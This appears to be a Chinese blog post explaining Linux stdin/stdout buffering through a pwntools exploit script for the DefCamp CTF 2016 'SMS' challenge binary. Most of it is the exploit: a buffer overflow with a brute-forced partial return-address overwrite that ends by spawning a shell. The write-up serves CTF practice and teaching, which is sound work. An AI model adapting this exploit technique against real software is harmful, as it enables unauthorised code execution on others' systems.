文章http://www.pixelbeat.org/programming/stdio_buffering/有linux stdin/stdout/stderr buffer的描述
1.stderr nobuffer
2.当stdin与stdout与终端连接时,为line buffered,buffer大小为1024,否则为block buffered,大小为4K
写DefCamp CTF Finals 2016-SMS/SMS exp时出的一个bug,再次加深对linux buffer理解
函数调用链main()->dosms()->1.set_user(),2.set_sms()
一、main() :
pus以下内容
--------------------------------------------
| Welcome to Defcamp SMS service |
--------------------------------------------
二、set_user():
1.puts("Enter your name")
2.printf("> ")
3.printf("Hi,%s"),把输入的name打印出来
三、set_sms():
1.puts("SMS our leader")
2.printf("> ")
四。dosms():
1.puts("SMS delivered")
下面是exp:
from pwn import *
context.clear(arch='amd64')
context.terminal = ['gnome-terminal','-x','sh','-c']
i = 0
while True:
i += 1
io = process('/root/Downloads/ctf/sms/200.bin')
x = io.recv() # --代码运行到此时, main() :puts()和set_user() :1.puts()都输出了,由于 stdout line buffered,此时print("> ")未输出,如果下面代码用recvuntil("> ")接收输入,肯定挂
print x
print x.encode('hex')
payload = 'a' * 40
payload += '\xca'
io.send(payload) #####stdin line buffed,payload发送不出去,也触发不了set_user():print("> ")的输出,此时只能换成sendline( payload )
y = io.recv()
print y
print y.encode('hex')
p2 = 'a' * 200
p2 += '\x01\xA9'
io.send(p2)
print io.recv()
try:
io.recv(timeout=1)
except EOFError as e:
io.close()
print("try num is : %d\n"%i)
continue
else:
sleep(0.1)
io.sendline("/bin/bash" + '\0')
sleep(0.1)
io.interactive()
break
网友评论